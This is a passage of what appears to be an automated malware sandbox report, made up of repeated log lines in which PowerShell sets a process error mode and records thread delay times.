                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591126Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590924Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590770Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590645Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590250Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590125Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590016Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589903Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589797Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589682Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589576Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589468Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589361Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589234Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589120Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589015Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588891Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588781Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588672Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588548Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588422Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588312Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588203Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588094Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587984Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587875Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587756Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587599Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587464Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587279Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587151Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587030Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590938
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590770
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590610
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590235
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590110
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589983
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589875
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589757
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589641
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589515
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589404
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589293
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589184
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589077
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588969
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588859
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588749
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588639
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588531
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588413
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588297
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588188
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588063
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587938
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587813
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587688
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587551
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587405
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587279
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587151
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587030
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591125
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590923
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590770
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590609
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590248
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590125
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590015
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589905
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589797
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589677
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589552
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589420
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589310
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589203
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 589077
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588968
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588859
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588749
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588639
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588531
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588413
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588312
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588203
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588094
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587984
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587875
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587756
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587598
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587464
